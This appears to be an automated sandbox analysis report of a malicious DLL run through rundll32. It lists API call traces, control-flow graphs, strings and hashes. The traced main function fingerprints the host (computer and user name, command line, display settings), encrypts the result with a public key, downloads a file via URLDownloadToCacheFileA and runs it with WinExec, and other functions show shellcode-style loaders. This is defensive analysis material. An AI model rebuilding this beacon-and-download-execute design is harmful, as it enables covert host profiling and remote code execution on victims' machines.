      • Associated: 00000000.00000002.27457175125.0000000000E5F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_c50000_loaddll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 68efc70c022f19015895ca48445a8fa5884402e72819478d6db38b7f7eb7305f
      • Instruction ID: 22da28141eb4685a0948e50dd3a343d4fd14f6f755dbe8c4b063a01c8680bec8
      • Opcode Fuzzy Hash: 68efc70c022f19015895ca48445a8fa5884402e72819478d6db38b7f7eb7305f
      • Instruction Fuzzy Hash: 4FF012B19043199FD710CF59E94056EBBF4FB49721B50843EE89897350D770A944CF69

      Execution Graph

      Execution Coverage:28.9%
      Dynamic/Decrypted Code Coverage:99%
      Signature Coverage:81.7%
      Total number of Nodes:104
      Total number of Limit Nodes:8
      execution_graph 1867 3000000 1869 3000005 1867->1869 1885 3000391 GetPEB 1869->1885 1872 3000391 GetPEB 1873 3000031 1872->1873 1874 3000391 GetPEB 1873->1874 1875 300003f 1874->1875 1876 3000391 GetPEB 1875->1876 1878 300004d VirtualAlloc 1876->1878 1882 30000aa 1878->1882 1879 300020a LoadLibraryA 1879->1882 1880 3000378 1881 3000259 LdrGetProcedureAddress 1881->1882 1882->1879 1882->1881 1884 300027c 1882->1884 1883 3000351 VirtualProtect 1883->1884 1884->1880 1884->1883 1886 3000023 1885->1886 1886->1872 1988 4d31680 1990 4d31c5c 1988->1990 1989 4d31d58 VirtualAlloc 1989->1990 1990->1989 1887 27ac18f6 CreateThread 1888 27ac18cb CreateEventA WaitForSingleObject 1887->1888 1891 27ac1120 1888->1891 1892 27ac18a5 TerminateProcess 1891->1892 1893 27ac1137 GetPEB 1891->1893 1893->1892 1894 27ac114b 1893->1894 1894->1892 1895 27ac116c GetTickCount 1894->1895 1895->1892 1896 27ac1188 SHGetValueA 1895->1896 1896->1892 1897 27ac11c7 SHSetValueA UuidCreateSequential sprintf 1896->1897 1898 27ac1244 RtlComputeCrc32 1897->1898 1898->1892 1899 27ac125f GlobalAlloc sprintf 1898->1899 1900 27ac12b7 RtlComputeCrc32 1899->1900 1902 27ac18a9 1900->1902 1904 27ac12db 1900->1904 1903 27ac18b4 GlobalFree 1902->1903 1903->1892 1904->1902 1905 27ac13c7 sprintf 1904->1905 1906 27ac13ed RtlComputeCrc32 1905->1906 1906->1902 1908 27ac1415 1906->1908 1908->1902 1909 27ac1420 sprintf GetModuleFileNameA 1908->1909 1911 27ac145c sprintf GetCommandLineA 1909->1911 1912 27ac1472 sprintf memset CryptBinaryToStringA 1911->1912 1913 27ac1509 sprintf 1912->1913 1915 27ac152f 1913->1915 1914 27ac15df memcpy 1919 27ac166f memcpy 1914->1919 1920 27ac16bb memset GlobalFree CryptAcquireContextA 1914->1920 1915->1914 1916 27ac1550 memset EnumDisplaySettingsA 1915->1916 1918 27ac15ab sprintf 1916->1918 1918->1915 1922 27ac16b1 1919->1922 1920->1892 1921 27ac1711 CryptDecodeObjectEx 1920->1921 1921->1892 1923 27ac1746 CryptImportPublicKeyInfo 1921->1923 1922->1920 1923->1892 1924 27ac1763 CryptEncrypt 1923->1924 1924->1892 1925 27ac1782 CryptBinaryToStringA memset GlobalFree 1924->1925 1932 27ac17f7 URLDownloadToCacheFileA lstrlen memset GlobalFree 1925->1932 1928 27ac185f _lopen 1929 27ac188a 1928->1929 1930 27ac1875 _hread _lclose 1928->1930 1929->1892 1931 27ac1896 WinExec 1929->1931 1930->1929 1931->1892 1932->1928 1932->1929 1933 4d322a8 1934 4d322e6 1933->1934 1934->1934 1935 4d3231e VirtualProtect 1934->1935 1937 4d31d04 1935->1937 1936 4d31d58 VirtualAlloc 1936->1937 1937->1936 1938 4d31eaf 1939 4d31ed8 1938->1939 1943 4e51460 1939->1943 1940 4d31d58 VirtualAlloc 1941 4d31d04 1940->1941 1941->1940 1944 4e514a5 1943->1944 1944->1944 1945 4e515cc 1944->1945 1947 4e57a20 1944->1947 1945->1941 1948 4e57a65 1947->1948 1949 4e5a642 1948->1949 1954 4e571d2 VirtualFree 1948->1954 1957 4e5a660 1948->1957 1961 4e522a0 1948->1961 1967 4e5a900 1948->1967 1949->1944 1956 4e57176 1954->1956 1955 4e57231 1955->1948 1956->1954 1956->1955 1960 4e5a6db 1957->1960 1958 4e5a812 1958->1948 1959 4e5a757 VirtualAllocExNuma 1959->1960 1960->1958 1960->1959 1962 4e52303 1961->1962 1963 4e56b8b 1962->1963 1964 4e571d2 VirtualFree 1962->1964 1966 4e5a660 VirtualAllocExNuma 1962->1966 1971 4e52084 1962->1971 1963->1948 1964->1962 1966->1962 1970 4e5a99f 1967->1970 1968 4e5aabe 1968->1948 1969 4e5aa2c VirtualProtect 1969->1970 1970->1968 1970->1969 1972 4e52087 NtCreateThreadEx 1971->1972 1973 4e5205c 1971->1973 1972->1973 1973->1971 1974 4e52130 1973->1974 1974->1962 1983 3000f1c CreateEventA WaitForSingleObject 1984 3000777 1983->1984 1985 3000f40 TerminateProcess 1984->1985 1986 3000f4d CreateThread 1987 27ac18cb 46 API calls 1986->1987 1975 30e1151 1976 30e1166 1975->1976 1979 30e2222 VirtualAlloc 1976->1979 1978 30e1189 1980 30e22c3 1979->1980 1980->1978 1981 30e1eb1 VirtualProtect 1982 30e1fcb 1981->1982

      Executed Functions

      Function 27AC1120 Relevance: 96.8, APIs: 42, Strings: 13, Instructions: 569encryptionprocessmemoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 27ac1120-27ac1131 1 27ac18be 0->1 2 27ac1137-27ac1145 GetPEB 0->2 4 27ac18c0-27ac18ca 1->4 2->1 3 27ac114b-27ac1154 2->3 3->1 5 27ac115a-27ac1166 3->5 5->1 6 27ac116c-27ac1182 GetTickCount 5->6 6->1 7 27ac1188-27ac11c1 SHGetValueA 6->7 7->1 8 27ac11c7-27ac1259 SHSetValueA UuidCreateSequential sprintf RtlComputeCrc32 7->8 8->1 10 27ac125f-27ac12d5 GlobalAlloc sprintf RtlComputeCrc32 8->10 13 27ac18a9-27ac18b8 call 27ac1923 GlobalFree 10->13 14 27ac12db-27ac12e0 10->14 13->1 14->13 15 27ac12e6-27ac12eb 14->15 15->13 16 27ac12f1-27ac12f6 15->16 16->13 18 27ac12fc-27ac1301 16->18 18->13 20 27ac1307-27ac130c 18->20 20->13 22 27ac1312-27ac1317 20->22 22->13 23 27ac131d-27ac1322 22->23 23->13 24 27ac1328-27ac132d 23->24 24->13 25 27ac1333-27ac1338 24->25 25->13 26 27ac133e-27ac1343 25->26 26->13 27 27ac1349-27ac134e 26->27 27->13 28 27ac1354-27ac1359 27->28 28->13 29 27ac135f-27ac1364 28->29 29->13 30 27ac136a-27ac136f 29->30 30->13 31 27ac1375-27ac137a 30->31 31->13 32 27ac1380-27ac1385 31->32 32->13 33 27ac138b-27ac1390 32->33 33->13 34 27ac1396-27ac139b 33->34 34->13 35 27ac13a1-27ac13a6 34->35 35->13 36 27ac13ac-27ac13b1 35->36 36->13 37 27ac13b7-27ac140f sprintf RtlComputeCrc32 36->37 37->13 41 27ac1415-27ac141a 37->41 41->13 42 27ac1420-27ac152a sprintf GetModuleFileNameA sprintf GetCommandLineA sprintf memset CryptBinaryToStringA sprintf 41->42 47 27ac15c9-27ac15d9 42->47 49 27ac152f-27ac153a 47->49 50 27ac15df-27ac166d memcpy 47->50 51 27ac153c-27ac154e call 27ac1911 49->51 52 27ac15b6-27ac15c8 49->52 60 27ac166f-27ac16a7 memcpy 50->60 61 27ac16bb-27ac170b memset GlobalFree CryptAcquireContextA 50->61 51->52 57 27ac1550-27ac15b3 memset EnumDisplaySettingsA sprintf 51->57 52->47 57->52 63 27ac16b1-27ac16b5 60->63 61->1 62 27ac1711-27ac1740 CryptDecodeObjectEx 61->62 62->1 64 27ac1746-27ac175d CryptImportPublicKeyInfo 62->64 63->61 64->1 65 27ac1763-27ac177c CryptEncrypt 64->65 65->1 66 27ac1782-27ac178e 65->66 67 27ac1790-27ac17b1 66->67 68 27ac17b3-27ac17f9 CryptBinaryToStringA memset GlobalFree 66->68 67->67 67->68 72 27ac17fb-27ac1801 68->72 73 27ac1824-27ac185d URLDownloadToCacheFileA lstrlen memset GlobalFree 68->73 76 27ac1809-27ac180c 72->76 77 27ac1803-27ac1807 72->77 74 27ac185f-27ac1873 _lopen 73->74 75 27ac188a-27ac1894 73->75 74->75 78 27ac1875-27ac1884 _hread _lclose 74->78 79 27ac18a5-27ac18a7 75->79 80 27ac1896-27ac189f WinExec 75->80 82 27ac180e-27ac1812 76->82 83 27ac1814-27ac1817 76->83 81 27ac1819-27ac181c 77->81 78->75 79->4 80->79 81->72 85 27ac181e 81->85 82->81 83->81 84 27ac1820 83->84 84->73 85->73
      APIs
      • GetTickCount.KERNEL32 ref: 27AC116C
      • SHGetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,?,?), ref: 27AC11B9
      • SHSetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,00000001,?), ref: 27AC11E0
      • UuidCreateSequential.RPCRT4(?), ref: 27AC11F5
      • sprintf.NTDLL ref: 27AC122C
      • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC124F
      • GlobalAlloc.KERNEL32(00000040,00001000,00000000,?,00000000), ref: 27AC1266
      • sprintf.NTDLL ref: 27AC128C
      • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC12CB
      • sprintf.NTDLL ref: 27AC13CA
      • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC1401
      • sprintf.NTDLL ref: 27AC1434
      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 27AC144A
      • sprintf.NTDLL ref: 27AC145F
      • GetCommandLineA.KERNEL32 ref: 27AC1467
      • sprintf.NTDLL ref: 27AC1475
      • memset.NTDLL ref: 27AC1482
      • CryptBinaryToStringA.CRYPT32(?,00000030,4000000C,?,?,?,?,?,00000000,00000030,00000000), ref: 27AC14F3
      • sprintf.NTDLL ref: 27AC150C
      • memset.NTDLL ref: 27AC155E
      • EnumDisplaySettingsA.USER32(?,000000FF,?), ref: 27AC1578
      • sprintf.NTDLL ref: 27AC15AE
      • memcpy.NTDLL(0000000C,00000000,?), ref: 27AC165B
      • memcpy.NTDLL(00000080,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000030,00000000), ref: 27AC167D
      • memset.NTDLL ref: 27AC16BF
      • GlobalFree.KERNEL32(00000000), ref: 27AC16C8
      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,?,00000000,?,00000000), ref: 27AC1703
      • CryptDecodeObjectEx.CRYPT32(00010001,00000008,27AC1000,000000A2,00008000,00000000,?,00000000), ref: 27AC1738
      • CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,?), ref: 27AC1755
      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000080), ref: 27AC1774
      • CryptBinaryToStringA.CRYPT32(00000000,?,40000001,?,00000000), ref: 27AC17D6
      • memset.NTDLL ref: 27AC17E3
      • GlobalFree.KERNEL32(00000000), ref: 27AC17EC
      • URLDownloadToCacheFileA.URLMON(00000000,00000000,?,00000105,00000000,00000000), ref: 27AC183B
      • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000105,00000000,00000000,?,?,?,?,?,?,00000000,?,00000000), ref: 27AC1843
      • memset.NTDLL ref: 27AC184C
      • GlobalFree.KERNEL32(00000000), ref: 27AC1855
      • _lopen.KERNEL32(?,00000000), ref: 27AC1868
      • _hread.KERNEL32(00000000,?,00000002), ref: 27AC187D
      • _lclose.KERNEL32(00000000), ref: 27AC1884
      • WinExec.KERNEL32(?,00000000), ref: 27AC189F
      • GlobalFree.KERNEL32(00000000), ref: 27AC18B8
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.22961902767.0000000027AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 27AC1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_27ac1000_rundll32.jbxd
      Similarity
      • API ID: sprintf$Crypt$Globalmemset$Free$ComputeCrc32$BinaryFileStringValuememcpy$AcquireAllocCacheCommandContextCountCreateDecodeDisplayDownloadEncryptEnumExecImportInfoLineModuleNameObjectPublicSequentialSettingsTickUuid_hread_lclose_lopenlstrlen
      • String ID: %02x%02x%02x%02x%02x%02x$%08x%08x*%s*%u$*%s$*%s_%s_%u_%u_%u$0$COMPUTERNAME$SOFTWARE\Microsoft\Mediaplayer$USERNAME$lol/$s://$w0t.$wnp^$?kL
      • API String ID: 3929119689-2541717829
      • Opcode ID: cbe10f6ba930fff9b99e63469f94eef1096c7ab02c519e9caa091d67d897b52f
      • Instruction ID: d1afb5b641d7297c3d98dbba34a3546c4b9938a4bc15ba799c89e36e1a3fbf9a
      • Opcode Fuzzy Hash: cbe10f6ba930fff9b99e63469f94eef1096c7ab02c519e9caa091d67d897b52f
      • Instruction Fuzzy Hash: 351291B1A08345BFE720DF64CD84FAB7BECBB94361F10492EF695D2141DA3899448B63
      Function 04E522A0 Relevance: 9.0, Strings: 2, Instructions: 6457COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 86 4e522a0-4e522fb 87 4e52303-4e5233f 86->87 87->87 88 4e52341-4e524bb 87->88 89 4e524c2-4e524d1 88->89 90 4e524d7-4e5252f 89->90 91 4e52636-4e52644 89->91 92 4e52531 90->92 93 4e52563-4e525f1 call 4e52084 90->93 94 4e52646-4e5268d 91->94 95 4e52692-4e526a2 91->95 96 4e52533-4e5255a 92->96 101 4e525f3-4e52631 93->101 97 4e52850-4e5285f 94->97 98 4e526a4-4e526f4 95->98 99 4e526f9-4e5270c 95->99 96->96 100 4e5255c 96->100 102 4e52865-4e5289d 97->102 103 4e53d68-4e53d7a 97->103 98->97 104 4e5270e-4e52735 99->104 105 4e5273a-4e5274c 99->105 100->93 101->97 108 4e528a3-4e528a6 102->108 109 4e52968-4e52b7f 102->109 106 4e53d7c-4e53da3 103->106 107 4e53da8-4e53db8 103->107 104->97 110 4e527d7-4e527e6 105->110 111 4e52752-4e527ba call 4e51450 call 4e5a660 105->111 106->89 114 4e53dce-4e53de0 107->114 115 4e53dba-4e53dc9 107->115 116 4e528ac-4e52957 108->116 117 4e5295e-4e52962 108->117 118 4e52f15-4e52f9e 109->118 119 4e52b85-4e52b8d 109->119 112 4e52804-4e52813 110->112 113 4e527e8-4e52802 110->113 139 4e527bc-4e527d5 111->139 124 4e52815-4e52835 112->124 125 4e52837-4e5284a 112->125 113->97 126 4e53de6-4e5494b 114->126 127 4e5515f-4e55171 114->127 115->89 116->117 117->108 117->109 122 4e52fd0-4e530a7 118->122 123 4e52fa0-4e52fa3 118->123 128 4e52b93-4e52ef9 119->128 129 4e52efb-4e52f0f 119->129 134 4e530e4-4e530ef 122->134 135 4e530a9-4e530af 122->135 130 4e52fa5-4e52fc3 123->130 131 4e52fca-4e52fce 123->131 124->97 125->97 136 4e56b8b-4e56b9e 125->136 137 4e54951-4e54957 126->137 138 4e54a0f-4e54a32 126->138 132 4e551e3-4e551f2 127->132 133 4e55173-4e551cd call 4e571d2 127->133 128->129 129->118 129->119 130->131 131->122 131->123 142 4e551f4-4e5520d 132->142 143 4e55212-4e55225 132->143 151 4e551cf-4e551de 133->151 146 4e530f5-4e530f8 134->146 147 4e531a8-4e53734 134->147 140 4e530b1-4e530d7 135->140 141 4e530de-4e530e2 135->141 144 4e54a05-4e54a09 137->144 145 4e5495d-4e549fe 137->145 148 4e54e91-4e55066 138->148 149 4e54a38-4e54a40 138->149 139->97 140->141 141->134 141->135 142->89 152 4e55227-4e55241 143->152 153 4e55246-4e55258 143->153 144->137 144->138 145->144 154 4e5319e-4e531a2 146->154 155 4e530fe-4e5319c 146->155 158 4e53d20-4e53d63 147->158 159 4e5373a-4e53742 147->159 150 4e5506d-4e55070 148->150 156 4e54e77-4e54e8b 149->156 157 4e54a46-4e54e75 149->157 160 4e55076-4e5510c 150->160 161 4e5510e-4e55112 150->161 151->89 152->89 162 4e5525e-4e557d3 153->162 163 4e557d8-4e557ea 153->163 154->146 154->147 155->154 156->148 156->149 157->156 158->89 164 4e53d06-4e53d1a 159->164 165 4e53748-4e53d04 159->165 160->161 161->150 168 4e55118-4e5515a 161->168 162->89 166 4e557f0-4e55b54 163->166 167 4e566fe-4e56710 163->167 164->158 164->159 165->164 169 4e55b56-4e55b59 166->169 167->89 170 4e56716-4e5688c 167->170 168->89 172 4e55b83-4e55b87 169->172 173 4e55b5b-4e55b81 169->173 174 4e56952-4e56954 170->174 175 4e56892 170->175 172->169 177 4e55b89-4e55e93 172->177 173->172 176 4e56959-4e5695b 174->176 178 4e56897-4e5689d 175->178 179 4e56984-4e56988 176->179 180 4e5695d-4e56981 176->180 181 4e55f5e-4e566f9 177->181 182 4e55e99-4e55ea1 177->182 183 4e568a3-4e56946 178->183 184 4e56948-4e5694c 178->184 179->176 185 4e5698a-4e56a9a 179->185 180->179 181->89 186 4e55ea7-4e55f4d 182->186 187 4e55f4f-4e55f58 182->187 183->184 184->174 184->178 188 4e56a9f-4e56aa2 185->188 186->187 187->181 187->182 189 4e56aa4-4e56ac5 188->189 190 4e56ac8-4e56acc 188->190 189->190 190->188 191 4e56ace-4e56b86 190->191 191->89
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: 5`oj$5`oj
      • API String ID: 0-1924437217
      • Opcode ID: 4d74d397a834e70dd0742a8b77353d84228a5c99b42a73e3addc7437e41ad09a
      • Instruction ID: 1d066bcf5556db28bf0704b565f633db50356d7859e400b0a2784d094811b7e2
      • Opcode Fuzzy Hash: 4d74d397a834e70dd0742a8b77353d84228a5c99b42a73e3addc7437e41ad09a
      • Instruction Fuzzy Hash: 8693F77BB546114BD72CCE7DCCD12E9A6C76BC8314F0ED63E894ADB398DDB898064680
      Function 03000005 Relevance: 6.3, APIs: 4, Instructions: 336memorylibraryloaderCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 195 3000005-3000065 call 3000391 * 4 204 3000086-30000a8 VirtualAlloc 195->204 205 3000067 195->205 206 30000b9-30000c5 204->206 207 30000aa-30000b7 204->207 208 3000069-3000070 205->208 209 30000c7-30000cc 206->209 210 30000dd-30000f7 206->210 207->206 211 3000072 208->211 212 3000075-3000084 208->212 214 30000ce-30000d8 209->214 215 3000132-300013b 210->215 216 30000f9 210->216 211->212 212->204 212->208 214->214 217 30000da 214->217 219 3000141-3000148 215->219 220 30001ea-30001f1 215->220 218 30000fb-30000ff 216->218 217->210 224 3000101 218->224 225 3000122-3000130 218->225 219->220 221 300014e-3000159 219->221 222 3000280-300028f 220->222 223 30001f7-3000208 220->223 221->220 226 300015f 221->226 229 3000295-3000298 222->229 230 3000378-300038e 222->230 223->222 227 300020a-3000222 LoadLibraryA 223->227 228 3000105-3000118 224->228 225->215 225->218 231 3000161-3000164 226->231 232 3000224 227->232 233 300026e-300027a 227->233 228->228 234 300011a-300011e 228->234 235 300029d-30002a0 229->235 238 30001d2-30001d9 231->238 239 3000226 232->239 233->227 241 300027c 233->241 234->225 236 30002a6-30002b0 235->236 237 3000368-3000372 235->237 242 30002b2-30002b4 236->242 243 30002bd-30002bf 236->243 237->230 237->235 246 3000166-3000177 238->246 247 30001db-30001e0 238->247 244 3000231-300023a 239->244 245 3000228-300022f 239->245 241->222 242->243 248 30002b6-30002b8 242->248 251 30002f1-30002f3 243->251 252 30002c1-30002c3 243->252 254 3000243-3000258 244->254 255 300023c-3000241 244->255 253 3000259-3000268 LdrGetProcedureAddress 245->253 249 3000195-3000199 246->249 250 3000179-3000193 246->250 247->231 256 30001e6 247->256 248->243 259 30002ba-30002bb 248->259 261 30001a8-30001ae 249->261 262 300019b-30001a6 249->262 260 30001cd-30001d0 250->260 257 30002f5-30002f7 251->257 258 30002fd-30002ff 251->258 263 30002c5-30002c7 252->263 264 30002cd-30002cf 252->264 253->239 265 300026a 253->265 254->253 255->254 255->255 256->220 257->258 266 30002f9-30002fb 257->266 268 3000301-3000303 258->268 269 300033b 258->269 267 300031f-3000323 259->267 260->238 271 30001b0-30001b5 261->271 272 30001b7-30001bd 261->272 262->260 263->264 270 30002c9-30002cb 263->270 264->251 273 30002d1-30002d3 264->273 265->233 275 300031e 266->275 274 300033f-3000346 267->274 276 3000310-3000312 268->276 277 3000305-3000307 268->277 269->274 270->275 278 30001c2-30001ca 271->278 272->260 279 30001bf 272->279 280 30002d5-30002d7 273->280 281 30002dd-30002df 273->281 282 3000351-3000363 VirtualProtect 274->282 283 3000348-300034d 274->283 275->267 276->269 285 3000314-3000316 276->285 277->276 284 3000309-300030e 277->284 278->260 279->278 280->281 286 30002d9-30002db 280->286 281->251 287 30002e1-30002e3 281->287 282->237 283->282 284->267 288 3000325-3000327 285->288 289 3000318-300031a 285->289 286->275 290 30002e5-30002e7 287->290 291 30002ed-30002ef 287->291 288->269 293 3000329-300032b 288->293 289->288 292 300031c 289->292 290->291 294 30002e9-30002eb 290->294 291->251 291->269 292->275 293->269 295 300032d-3000339 293->295 294->275 295->267
      APIs
      • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 030000A0
      • LoadLibraryA.KERNEL32(?), ref: 0300020D
      • LdrGetProcedureAddress.NTDLL(00000000,?,00000000,?), ref: 0300025A
      • VirtualProtect.KERNEL32(?,?,?,?), ref: 0300035F
      Memory Dump Source
      • Source File: 00000003.00000002.22959828960.0000000003000000.00000020.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_3000000_rundll32.jbxd
      Similarity
      • API ID: Virtual$AddressAllocLibraryLoadProcedureProtect
      • String ID:
      • API String ID: 3829562780-0
      • Opcode ID: 3c0398302410d883315648ee21e8cbdebfa52049138ef01b04af12db65d8c14a
      • Instruction ID: cbd1ec8b20a86d912028a5a7020a8663d79bdf63257b87e64bad2fd255ff4a1e
      • Opcode Fuzzy Hash: 3c0398302410d883315648ee21e8cbdebfa52049138ef01b04af12db65d8c14a
      • Instruction Fuzzy Hash: DCB1CF746063069BFB69CF29C89077AB7E9BF88704F08446DE982CB2C1E774E981C755
      Function 064D112C Relevance: 5.0, APIs: 3, Instructions: 540memoryCOMMON
      Download Yara Rule
      APIs
      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 064D1321
      • VirtualProtect.KERNEL32(?,?,?,?), ref: 064D1627
      • VirtualProtect.KERNEL32(?,?,?,?), ref: 064D16ED
      Memory Dump Source
      • Source File: 00000003.00000003.22555604072.00000000064D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 064D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_64d1000_rundll32.jbxd
      Similarity
      • API ID: Virtual$Protect$Alloc
      • String ID:
      • API String ID: 2541858876-0
      • Opcode ID: 8a9f7bff29d09125300a55d5047dce2db5ac68348d537c08f8c8cb9da5f864e4
      • Instruction ID: c3282f20095480ec049f59f852cce33bf6326ff72f290da753e7c34659d8fadc
      • Opcode Fuzzy Hash: 8a9f7bff29d09125300a55d5047dce2db5ac68348d537c08f8c8cb9da5f864e4
      • Instruction Fuzzy Hash: 7122B276E001259FDB58CF29CC506E9B7B6BFC9314F29C19AD409AB355DB30AD868F80
      Function 06627F59 Relevance: 5.0, Strings: 1, Instructions: 3784COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: R4Vd
      • API String ID: 0-3306949354
      • Opcode ID: 9397e5e544d11b6afc9ecfd8ac9cef047ef8fb6d16555813938544861f7003c3
      • Instruction ID: 09b082086e1ada63bac72ca0c2922af4fc1facba92c0aae86aad2d50545a7e1f
      • Opcode Fuzzy Hash: 9397e5e544d11b6afc9ecfd8ac9cef047ef8fb6d16555813938544861f7003c3
      • Instruction Fuzzy Hash: 4E7380726096928FD774CF29C980BABB7E2BBC9314F158A1DD499D7394DB30A805CF81
      Function 06608DA0 Relevance: 5.0, Strings: 3, Instructions: 1242COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: !$MSR$ecf
      • API String ID: 0-784032842
      • Opcode ID: caf0e3da6aef8be7a8df034d54d803c5d896f04cec27e09084bb7dbfdc1752a9
      • Instruction ID: 67866ddf339191493bb036fc80fb74eb1c91b9674e3b3f0a821683acc55a6896
      • Opcode Fuzzy Hash: caf0e3da6aef8be7a8df034d54d803c5d896f04cec27e09084bb7dbfdc1752a9
      • Instruction Fuzzy Hash: 9CB29F726087818FD778CF29C88479BB7E2BBC9314F159A2DD499CB395DB349842CB42
      Function 04FDE58D Relevance: 4.9, APIs: 2, Instructions: 2374memoryCOMMON
      Download Yara Rule
      APIs
      • VirtualAlloc.KERNEL32(00000000,?,?,?), ref: 04FDE679
      • VirtualAlloc.KERNEL32(00000000,?,?,?), ref: 04FDF73C
      Memory Dump Source
      • Source File: 00000003.00000003.22528407120.0000000004FDD000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FDD000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_4fdd000_rundll32.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 4ef5e6f3f24ca39d9c83c0dc6a6c31688bf2c78410e3a90c5f5409f422b3077b
      • Instruction ID: 7c81ab0deb12492b4201463ca405a533e56cce0e72a8e2f0ec11e72d6d32189b
      • Opcode Fuzzy Hash: 4ef5e6f3f24ca39d9c83c0dc6a6c31688bf2c78410e3a90c5f5409f422b3077b
      • Instruction Fuzzy Hash: 7B030936A047628FD728CE29C8D47DAB3D3BFC4314F598A3DD889CB245DB7598468B81
      Function 0660DB70 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 216fileCOMMON
      Download Yara Rule
      APIs
      • FindNextFileW.KERNEL32(?,?), ref: 0660DCD2
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: FileFindNext
      • String ID: L
      • API String ID: 2029273394-2909332022
      • Opcode ID: fb953a26b277d42a089ad1b34f58383574c82e397c87c262484869db7d63a950
      • Instruction ID: fb28bdc8039056efdb2e89f7466999b5097d4410af9d796249516493be1a2909
      • Opcode Fuzzy Hash: fb953a26b277d42a089ad1b34f58383574c82e397c87c262484869db7d63a950
      • Instruction Fuzzy Hash: EB919C329087518FD314CF28C88065BB7E2FFC9314F668A29E9959B394D775F806CB91
      Function 06601370 Relevance: 3.4, Strings: 2, Instructions: 946COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: D$t
      • API String ID: 0-777169037
      • Opcode ID: 8b3af3fb245a4836f2b62cac415770770b4c7dae47989a2f4c7f668feb886fb2
      • Instruction ID: b4908e209f789645f749e5b7cf09107259e0307fa3cfdbc0b38bbb4d786a3636
      • Opcode Fuzzy Hash: 8b3af3fb245a4836f2b62cac415770770b4c7dae47989a2f4c7f668feb886fb2
      • Instruction Fuzzy Hash: 1E8260366193818FD778CF68C5C4A9BF7E6BBC9310F158A2DC4898B394DB34A945CB81
      Function 06622360 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 194sleepCOMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: Sleep
      • String ID: 'RX0
      • API String ID: 3472027048-656561589
      • Opcode ID: 4385d83b41b040af81cd74dcc48b9b0143d3b6a66f068ec091eaf1c58173d332
      • Instruction ID: 1acfdb5e8f7007c9845f842c8a24bda33db47a37e5d767ae9e34aa45c3384e4e
      • Opcode Fuzzy Hash: 4385d83b41b040af81cd74dcc48b9b0143d3b6a66f068ec091eaf1c58173d332
      • Instruction Fuzzy Hash: 7971BF72A187558FD304CE39C89052BBBE7BBD8310F1A892DE595D7354DB71E902CB81
      Function 04D322A8 Relevance: 3.2, APIs: 2, Instructions: 172memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
